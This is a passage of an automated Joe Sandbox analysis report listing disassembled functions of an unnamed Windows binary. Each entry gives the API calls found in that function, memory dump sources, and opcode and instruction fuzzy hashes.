                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy
                                                                      • String ID:
                                                                      • API String ID: 3226157194-0
                                                                      • Opcode ID: 8432cb8aabcdb59cc3d1bb508ccb3660ff837f8471973aded51ffdaae04ff6aa
                                                                      • Instruction ID: 8f92a7e2bd3797693fa224c90f3c0d2f7934701e2185a50d4c872ad6cbf7b6a5
                                                                      • Opcode Fuzzy Hash: 8432cb8aabcdb59cc3d1bb508ccb3660ff837f8471973aded51ffdaae04ff6aa
                                                                      • Instruction Fuzzy Hash: 61B14D72E00129ABDF25EFA4CC89EDEB7BDEF48350F1040A6F509E6141EA319E449F61
                                                                      Function 00C5BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CC3700), ref: 00C5BB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C5BC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CF1270,000000FF,?,0000003F,00000000,?), ref: 00C5BC36
                                                                      • _free.LIBCMT ref: 00C5BB7F
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5BD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1286116820-0
                                                                      • Opcode ID: 795204dc61ba270fd77a27bd0e1ffc9e0a6aaa323f7592ecd5f5cb8f6605a213
                                                                      • Instruction ID: 087778ad96951e2e493daedd1b08e11f2ea3e394ad88eb525be2748437475db2
                                                                      • Opcode Fuzzy Hash: 795204dc61ba270fd77a27bd0e1ffc9e0a6aaa323f7592ecd5f5cb8f6605a213
                                                                      • Instruction Fuzzy Hash: 03510B75900209DFCB10DFA5DC81ABEBFB8EF41321B14026AED64E71A1EB705E89D758
                                                                      Function 00C8E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C8CF22,?), ref: 00C8DDFD
                                                                        • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C8CF22,?), ref: 00C8DE16
                                                                        • Part of subcall function 00C8E199: GetFileAttributesW.KERNEL32(?,00C8CF95), ref: 00C8E19A
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C8E473
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C8E4AC
                                                                      • _wcslen.LIBCMT ref: 00C8E5EB
                                                                      • _wcslen.LIBCMT ref: 00C8E603
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C8E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3183298772-0
                                                                      • Opcode ID: ecb4c5dc828945c6350554b2f83b9e816806a15ed83af25bfab9a67fd8823e31
                                                                      • Instruction ID: 0d7b04cf528491938c7e8f9b9c2b1d8296b9ecc82edb081d8ea9710c7b7d6fca
                                                                      • Opcode Fuzzy Hash: ecb4c5dc828945c6350554b2f83b9e816806a15ed83af25bfab9a67fd8823e31
                                                                      • Instruction Fuzzy Hash: D25162B25083455BC734FBA0D8819DFB3ECAF85344F00492EF599D3191EF74A688976A
                                                                      Function 00C88BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00C88BCD
                                                                      • VariantClear.OLEAUT32 ref: 00C88C3E
                                                                      • VariantClear.OLEAUT32 ref: 00C88C9D
                                                                      • VariantClear.OLEAUT32(?), ref: 00C88D10
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C88D3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 2261bc14d92bbf0f751a94d42746f91dff2d27ef3141a4ebddcdbc67b7e122fc
                                                                      • Instruction ID: 79db256667961928e3af625c272c57da4ed6100eeeaec7d2c61862a287287907
                                                                      • Opcode Fuzzy Hash: 2261bc14d92bbf0f751a94d42746f91dff2d27ef3141a4ebddcdbc67b7e122fc
                                                                      • Instruction Fuzzy Hash: B5518AB5A0021AEFCB10DF28C884AAAB7F8FF89314F11855AE915DB350E730E911CF94
                                                                      Function 00C98AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C98BAE
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C98BDA
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C98C32
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C98C57
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C98C5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: 3d5664939930cf00f18c608d5ba8ab8223c55ae45fcc6dc48e93ef9eb5d3de9d
                                                                      • Instruction ID: 1f6a759f03e27b13732a94f7a076f7e26aeac0697b75a2cae83ece984eb85130
                                                                      • Opcode Fuzzy Hash: 3d5664939930cf00f18c608d5ba8ab8223c55ae45fcc6dc48e93ef9eb5d3de9d
                                                                      • Instruction Fuzzy Hash: 65515A35A002159FCF00DF64C884A6EBBF5FF49314F088468E849AB362CB31ED51DB90
                                                                      Function 00CB6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CB6C33
                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00CB6C4A
                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CB6C73
                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C9AB79,00000000,00000000), ref: 00CB6C98
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CB6CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MessageSendShow
                                                                      • String ID:
                                                                      • API String ID: 3688381893-0
                                                                      • Opcode ID: 2364f42d8c6bff2af8aa53c012939faf70840343515a4c9584f07c3cab478535
                                                                      • Instruction ID: 8c29f325cf4171fc246e56ff97eb63392fdbef5253930a8cbb112eb0c425f808
                                                                      • Opcode Fuzzy Hash: 2364f42d8c6bff2af8aa53c012939faf70840343515a4c9584f07c3cab478535
                                                                      • Instruction Fuzzy Hash: DA41C335604104AFDB24CF68CC98FF97FA9EB09360F150268F9A5A72E0C775EE41DA90
                                                                      Function 00C52051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: e1dd813f3641a48ce2b5ab09fe81710fb601c21ddce7a51f57748d023ca6789c
                                                                      • Instruction ID: fa6b7377ab81cdf116e6791d22d187a618dc94ccb7abf54804f5678439df67c2
                                                                      • Opcode Fuzzy Hash: e1dd813f3641a48ce2b5ab09fe81710fb601c21ddce7a51f57748d023ca6789c
                                                                      • Instruction Fuzzy Hash: 59410436E002009FCB24DF78C980A5EB3F5EF8A310F154568E916EB392D731AE45DB84
                                                                      Function 00C93874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00C938CB
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C93922
                                                                      • TranslateMessage.USER32(?), ref: 00C9394B
                                                                      • DispatchMessageW.USER32(?), ref: 00C93955
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C93966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: ab40de2c3a6090db0d6602c00e178db672a361a6a78d7fc7acdd916a4ab448dc
                                                                      • Instruction ID: 8577350ef7c361c7d814541fe9dc876dafab58491d0d1d0c1c820e59ae937fd9
                                                                      • Opcode Fuzzy Hash: ab40de2c3a6090db0d6602c00e178db672a361a6a78d7fc7acdd916a4ab448dc
                                                                      • Instruction Fuzzy Hash: C231A6705043C1DEEF35CB35984CBBA37A8AB15314F09056DE876D61E0E7B49B89CB12
                                                                      Function 00C81901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00C81915
                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C819C1
                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00C819C9
                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C819DA
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C819E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 24ad7681d6d28e5a518b5a1aa97d9b77bc3f38d12625533356681e7e4bf75236
                                                                      • Instruction ID: de934a41853c575cfbf6008a010772be3037958bbea362d57ffe7479242bf160
                                                                      • Opcode Fuzzy Hash: 24ad7681d6d28e5a518b5a1aa97d9b77bc3f38d12625533356681e7e4bf75236
                                                                      • Instruction Fuzzy Hash: 2231AF71900219EFCB00DFA8C999BEE3BB9EB04319F144225FD61A72D1C7709A55CB90
                                                                      Function 00C9CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CF38
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00C9CF6F
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CFB4
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CFC8
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CFF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 3191363074-0
                                                                      • Opcode ID: d45a6135dd5318e14445b143b18e2a89c6afb96ba056b16bf944b8a37eb97d91
                                                                      • Instruction ID: d981a4ed833a411e63613fcaef027b6d30dc8d11ff99f16fbacfc34443f09247
                                                                      • Opcode Fuzzy Hash: d45a6135dd5318e14445b143b18e2a89c6afb96ba056b16bf944b8a37eb97d91
                                                                      • Instruction Fuzzy Hash: 5B312971A04605AFDF20DFE5C9C8AAFBBF9EB14355F10442EF516E2151EB30AE419B60
                                                                      Function 00C5CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00C5CDC6
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C5CDE9
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C5CE0F
                                                                      • _free.LIBCMT ref: 00C5CE22
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C5CE31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: 86e3c37363521e5b11a341ed05abdc6f805c05f630c736e7a14e43cb629d9288
                                                                      • Instruction ID: a1eaf97c756b08e9f063084f6969a596fd3b4dabe1391eb5e7688ae939a25b5d
                                                                      • Opcode Fuzzy Hash: 86e3c37363521e5b11a341ed05abdc6f805c05f630c736e7a14e43cb629d9288
                                                                      • Instruction Fuzzy Hash: F701477A6013113F232116BA6CCEE7F7A6CDEC2BA23140229FD11D3200EAA08E4591B8
                                                                      Function 00C39639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C39693
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C396A2
                                                                      • BeginPath.GDI32(?), ref: 00C396B9
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C396E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 01d79d2d89401c2bd767414774377aa2c63c6438f491ab09274717003f241725
                                                                      • Instruction ID: 80b4ae2ee391a818f498802a5a2857f0966baa072bc58bda4f513b4c0a75a7f6
                                                                      • Opcode Fuzzy Hash: 01d79d2d89401c2bd767414774377aa2c63c6438f491ab09274717003f241725
                                                                      • Instruction Fuzzy Hash: 7E216A30812205EBDB119F29EC597BD3BB8FB10325F184216F820A61B0D3F09A91CFD1
                                                                      Function 00C85711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: e51b6eee96deb609b295629cd9b944d3373404a860da93e7abb859755e491bc1
                                                                      • Instruction ID: 8bb9640f6008dfafbca6b85944314ccd121ca11750a7040626992fd0c23ad42d
                                                                      • Opcode Fuzzy Hash: e51b6eee96deb609b295629cd9b944d3373404a860da93e7abb859755e491bc1
                                                                      • Instruction Fuzzy Hash: C701B5A5661609BBE2186511DD82FFB735CAB21398F448034FD149B241F7A0EE9193A8
                                                                      Function 00C52DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00C4F2DE,00C53863,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6), ref: 00C52DFD
                                                                      • _free.LIBCMT ref: 00C52E32
                                                                      • _free.LIBCMT ref: 00C52E59
                                                                      • SetLastError.KERNEL32(00000000,00C21129), ref: 00C52E66
                                                                      • SetLastError.KERNEL32(00000000,00C21129), ref: 00C52E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: ddaa5e3e4a6d9bad15b1dc40b256b5b972320c69034cdd9f8463e92063c4407a
                                                                      • Instruction ID: f24b54db4efb4e0cc52687e385d848b0c1aab3b7f500771d7792f09c10d51a7e
                                                                      • Opcode Fuzzy Hash: ddaa5e3e4a6d9bad15b1dc40b256b5b972320c69034cdd9f8463e92063c4407a
                                                                      • Instruction Fuzzy Hash: 6A01FE3E10550067C61227756C87F6F16D99BD33A7F244129FC31A2293DFA49DCD5128
                                                                      Function 00C8000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?,?,00C8035E), ref: 00C8002B
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?), ref: 00C80046
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?), ref: 00C80054
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?), ref: 00C80064
                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?), ref: 00C80070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: 1e9447ea1817f109f5c86e7bde08b8ce4b2f814d7d975e9b1ca87d048f1c0d09
